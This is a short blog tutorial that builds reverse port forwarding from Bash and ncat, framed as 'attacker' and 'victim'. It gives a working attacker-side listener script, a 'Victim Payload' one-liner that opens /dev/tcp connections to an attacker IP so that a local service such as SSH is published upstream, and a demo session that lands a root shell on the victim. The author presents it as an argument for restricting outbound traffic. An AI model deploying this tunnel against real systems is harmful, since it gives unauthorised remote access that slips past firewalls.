Etherarp
Etherarp

Networking, Security, Linux

Share


Reverse Port Forwarding with Bash

I had wondered for a while how SSH reverse port forwarding works. RPF allows you to publish any reachable port upstream to a server. This allows you to act as a server without having to open any external ports.

Rohan MolloyRohan Molloy

I had wondered for a while how SSH reverse port forwarding works - A feature allowing the client to publish a locally reachable destination upstream to the server.

This tutorial demonstrates how to implement that functionality using Bash and netcat. This allows remote access without having to open any external ports.

For this scenario, the upstream server is referred to as the 'attacker' and the downstream client is referred to as the 'victim'. Any service reachable from the 'victim' can be made reachable to the 'attacker'

This type of tool demonstrates why restricting outbound network connectivity is important for hardening systems.

Attacker Server  

############################################
# Remote-Port-Forwarding Server (Attacker) #
############################################

### Listen for connections from victim
listen_external='0.0.0.0 8080'

### Local socket to access victim
listen_internal='127.0.0.1 2222'

### Create a FIFO (named pipe)
fifo=$(mktemp -u)
mkfifo $fifo

### Start the listener
ncat -l $listen_external 0<$fifo | ncat -l $listen_internal >$fifo

### Clean up
echo 'Lost connection!'
rm $fifo

Victim Payload

echo "[$$] Publishing local port to server" \
&& exec 3<>/dev/tcp/$VICTIM_IP/$VICTIM_PORT \
&& exec 4<>/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT \
&& bash <(cat 0<&3 1>&4 & ) \
&& cat 0<&4 1>&3

Trying it out

root@attacker:/# ./bash-remote-port-forwarding-server.sh &
[1] 9357
root@attacker:/# ssh 127.0.0.1 -p 2222
root@victim:/#
[user@victim ~]$ echo "[$$] Publishing local port to server" \
> && exec 3<>/dev/tcp/127.0.0.1/22 \
> && exec 4<>/dev/tcp/10.3.141.59/8080 \
> && bash <(cat 0<&3 1>&4 & ) \
> && cat 0<&4 1>&3
[19156] Publishing local port to server
[user@victim ~]$

References

https://www.frameloss.org/2013/12/14/wicked-cool-reverse-proxy-with-bash-and-netcat/

Author

Rohan Molloy

View Comments